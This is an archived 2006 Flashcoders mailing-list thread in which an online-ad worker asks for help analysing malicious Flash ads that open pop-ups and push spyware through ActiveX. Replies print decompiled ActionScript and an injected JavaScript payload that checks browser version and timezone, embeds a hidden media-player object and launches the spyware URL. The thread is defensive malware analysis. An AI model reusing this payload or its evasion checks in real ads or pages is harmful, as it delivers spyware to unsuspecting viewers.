[Flashcoders] Decompiling some sketchy flash code
Dear List, First off, apologies if this is the wrong forum for this question. Some background -- I'm in the online advertising industry and I've been trying to track down an squash a scam that has been hitting the industry. There is a party out there (errorsafe.com) that is embedding some very nasty code in their flash ads that depending on several factors will popup a new window and try install their spyware using active-x. Here are two sample swf files: http://content.yieldmanager.com/13312/94749/27e558c94df509ebe888fdc0060640e8.swf http://content.yieldmanager.com/17344/138497/6d4ef47cf4071557d6749ad9c2fcf8cc.swf Now I've been decompiling extracting code with various tools to try to gain some insight. So interestingly enough, one of them is a little older, and it's easier to point blame as in the 'constants' the following is defined: constants [...some taken out...] 'http://www.errorsafe.com/pages/scanner/index.php?aid=tigerlid=swf7ax=1ex=1ed=2', 'http://uk.matchservice.com/reg_swf.php?campaign=tiger', 'easyPP', 'http://uk.matchservice.com/?aid=tigerlid=swf7ax=0', 'tz_begin', 'tz_end', 'javascript:var w=window,n=navigator,a=n.appMinorVersion,d=document,u=\'', '\',dt=new Date(),tz=-dt.getTimezoneOffset()/60;p=(n.userAgent.indexOf(\'SV1\')!=-1)||(a(a.indexOf(\'SP2\')!=-1));i=(d.allencodeURI()!w.Event);if(!(tz=', 'tz=', ')){if(p!d.getElementById(\'o\')){d.body.innerHTML+=\'object id=o height=0 classid=CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6/object\';};(ip)?o.launchURL(u):w.open(u);};void 0;', 'jscript', '\';p=(n.userAgent.indexOf(\'SV1\')!=-1)||(a(a.indexOf(\'SP2\')!=-1));i=(d.allencodeURI()!w.Event);if(p!d.getElementById(\'o\')){d.body.innerHTML+=\'object id=o height=0 classid=CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6/object\';};(ip)?o.launchURL(u):w.open(u);void 0;', 'unique:Date', 'Date', 'my_date:Date', 'my_so:SharedObject', '/', 'tiger_swf7300506', 'SharedObject', 'getLocal', 'tm', 'setswfashCookie', 'ClickTAG', 'ClickTARGET', '_blank', 'URL_btn', 'onRelease' The other file seems to have encrypted this informaiton to make it hard to track down: 'setcookie...', '_level0', 'l2', 'c1', 'l24', 'l1', 'l21', 'l22', 'l23', 'l25', 'this', 'l27', 't', 'l26', 'u', 'l31', 'l32', 'l28', '_global', 'i', '_ll2', 'l33', 'l35', ' - ', 'l43', 'l34', 's', '_self', 'l37', 'l36', '??', '', '', '???', '???', '???', '?', '', '???', '?', 'l29', '???', 'l30', '?', '???', '?', '???', '?', '?', '??', '?ý?ý?ÿÖ?ý?¼?Ù??È?Ù?ý???ý???ÈýÙ?Êý??éò??È?Ù??ÿ?È?Ù¾ÖËË???Ê??ý??Êÿ??Ë?ý???Ë?ÿýË?Ê???Ûý??ÙÎÌÌÏÂ???ÙÂý?ÙÍÂ??ÙÍÂ??ÙξÈ??Ù???¼àý??ÄÅÈ??ÙÉ??Ê???ð???ë?ÄÅËÒÌ×??ĽÄ??ÚÙÉÕÂÂ??ØÙÉÏÅÅ???Ľ?Ê???á??Þ?å?ľ?¾ÅÅ??Êþ???Ê?äðéèÇÙÃØ?þ??ÿ?¼??Ù?¼??Ùø¾Ìø¾¼ÿ?ýÙø¾ßèïåàÖÒÞâÑÎÝÑÎÉÏÕÐÝÉÍÍàÏÉÞÍÑÏÉÌÌßÌÐâÓÕâÝÝÒø¾ÚØË?þ??ÿ?ÚÃ?×?Ê?ý??ÿ?ñîèÄ?Å?ÿý?ÿ?Ä?Å??ÊÄ?Å×ÄÌÅ×??×', 'l38', '', 'l39', '', 'l40', '?', 'l41', '???', 'l42', '??', '?', 'String', 'prototype', '', 'split', 'length', 'charCodeAt', 'fromCharCode', 'join', 'newMenu', 'ContextMenu', 'hideBuiltInItems', 'menu', 'Date', 'epru2003intl592006', 'b', ' : ', '_ll1', 'ClickTAG', 'http://workhomecenter.com/?aid=istemlid=intl', 'ClickTARGET', '_blank' So I'm kind of at a loss as to how to figure out what this flash file does. They've clearly masked their code quite well to make it very difficult ot see. I do know a few things: - The file loads an outside html file, which checks the user's IP address, and depending on the geo that IP matches to returns a 1/0 value (or in some cases, an encrypted 'yes/no') as to whether or not to serve a pop - The flash file also checks the timezone of the browser in addition to IP as an added check that the user is outside the US. Any insight? Again, apologies if this is the wrong list to ask and I will greatly appreciate direction if it isn't! -Mike ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
RE: [Flashcoders] Decompiling some sketchy flash code
All I see on decompiling is things like: var eval (\x01) = 930; while (while (while (while (while (while (while (while (while (while (while (while (while (while (while (while (while (while (eval (\x01) == 930) { eval (\x01) = eval (\x01) - 695} , eval (\x01) == 67) { eval (\x01) = eval (\x01) + 718// branch @1 } , eval (\x01) == 349) { eval (\x01) = eval (\x01) + 149// branch @1 } , eval (\x01) == 264) { eval (\x01) = eval (\x01) + 84} Am I missing something? -Mike -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Michael Stuhr Sent: Wednesday, September 20, 2006 5:05 PM To: Flashcoders mailing list Subject: Re: [Flashcoders] Decompiling some sketchy flash code Michiel Nolet schrieb: Dear List, First off, apologies if this is the wrong forum for this question. Some background -- I'm in the online advertising industry and I've been trying to track down an squash a scam that has been hitting the industry. There is a party out there (errorsafe.com) that is embedding some very nasty code in their flash ads that depending on several factors will popup a new window and try install their spyware using active-x. Here are two sample swf files: http://content.yieldmanager.com/13312/94749/27e558c94df509ebe888fdc006 0640e8.swf http://content.yieldmanager.com/17344/138497/6d4ef47cf4071557d6749ad9c 2fcf8cc.swf i tried to decompile them with asv (latest version). i can clearly see what is inside there. i would give you the rebuild files, but maybe you should ask burak himself (he is on this list) to give you those. micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
RE: [Flashcoders] Decompiling some sketchy flash code
I am more than willing to shell $59.95 for asv, I just want to make sure it can extract stuff that other toosl couldn't. I've tried the free command line ones, and shell out $30 for some crappy software that plain didn't work. Could you copy paste some sample lines of more informative code you're finding? -Mike -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Michael Stuhr Sent: Wednesday, September 20, 2006 6:11 PM To: Flashcoders mailing list Subject: Re: [Flashcoders] Decompiling some sketchy flash code Michiel Nolet schrieb: All I see on decompiling is things like: var eval (\x01) = 930; while (while (while (while (while (while (while (while (while (while (while (while (while (while (while (while (while (while (eval (\x01) == 930) { eval (\x01) = eval (\x01) - 695} , eval (\x01) == 67) { eval (\x01) = eval (\x01) + 718// branch @1 } , eval (\x01) == 349) { eval (\x01) = eval (\x01) + 149// branch @1 } , eval (\x01) == 264) { eval (\x01) = eval (\x01) + 84} Am I missing something? sure buy a copy of asv and you get the full experience :-) micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
RE: [Flashcoders] Decompiling some sketchy flash code
Not at all, that is awesome, you don't understand how many hours I've been trying to find that info. I also have plenty more flash files to get the code from :). It's actually kind of interesting that they use javascript that checks useragent, timezone, etc. on whether a pop should be launched or not. Burak, can I contact you at manitu at buraks.com ? -Mike -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Michael Stuhr Sent: Wednesday, September 20, 2006 6:52 PM To: Flashcoders mailing list Subject: Re: [Flashcoders] Decompiling some sketchy flash code Michiel Nolet schrieb: I am more than willing to shell $59.95 for asv, I just want to make sure it can extract stuff that other toosl couldn't. I've tried the free command line ones, and shell out $30 for some crappy software that plain didn't work. Could you copy paste some sample lines of more informative code you're finding? function setswfashCookie() { my_date.setTime(my_date.getTime() + 43200); my_so.data.expires = my_date.getTime(); my_so.swfush(); if (_root.strong) { this.createEmptyMovieClip(target_mc, this.getNextHighestDepth()); target_mc.unique = unique.getTime(); target_mc.loadVariables(_root.sscript, GET); target_mc.param_interval = setInterval(checkParamsLoaded, 100); } } function checkParamsLoaded() { if (target_mc.popup == undefined) { } else if (target_mc.popup == 1) { clearInterval(target_mc.param_interval); getURL (_root.tzjscript, _self); } else if (target_mc.popup == 0) { clearInterval(target_mc.param_interval); } } _root.strong = true; _root.strongPP = ###; _root.sscript = ###; _root.easyPP = ###; _root.tz_begin = -3; _root.tz_end = -9; _root.tzjscript = (javascript:var w=window,n=navigator,a=n.appMinorVersion,d=document,u=' + _root.strongPP) + ',dt=new Date(),tz=-dt.getTimezoneOffset()/60;p=(n.userAgent.indexOf('SV1')!=-1)| |(a(a.indexOf('SP2')!=-1));i=(d.allencodeURI()!w.Event);if(!(tz= ) + _root.tz_end) + tz=) + _root.tz_begin) + )){if(p!d.getElementById('o')){d.body.innerHTML+='object id=o height=\0\ classid=\CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6\/object';};(i p)?o.launchURL(u):w.open(u);};void 0;; _root.jscript = (javascript:var w=window,n=navigator,a=n.appMinorVersion,d=document,u=' + _root.strongPP) + ';p=(n.userAgent.indexOf('SV1')!=-1)||(a(a.indexOf('SP2')!=-1));i=(d. allencodeURI()!w.Event);if(p!d.getElementById('o')){d.body.innerHT ML+='object id=o height=\0\ classid=\CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6\/object';};(i p)?o.launchURL(u):w.open(u);void 0;; var unique:Date = new Date(); var my_date:Date = new Date(); var my_so:SharedObject = SharedObject.getLocal(tiger_swf7300506, /); if (my_so.data.expires != undefined) { var tm = my_date.getTime(); if (tm my_so.data.expires) { setswfashCookie(); } } else { setswfashCookie(); } if (_root.ClickTAG == undefined) { _root.ClickTAG = _root.easyPP; } if (_root.ClickTARGET == undefined) { _root.ClickTARGET = _blank; } _root.URL_btn.onRelease = function () { getURL (_root.ClickTAG, _root.ClickTARGET); }; those ###'s are real urls. and those are only the actions on frame 1 ... i guess you lost ~60 bucks right now :-) micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com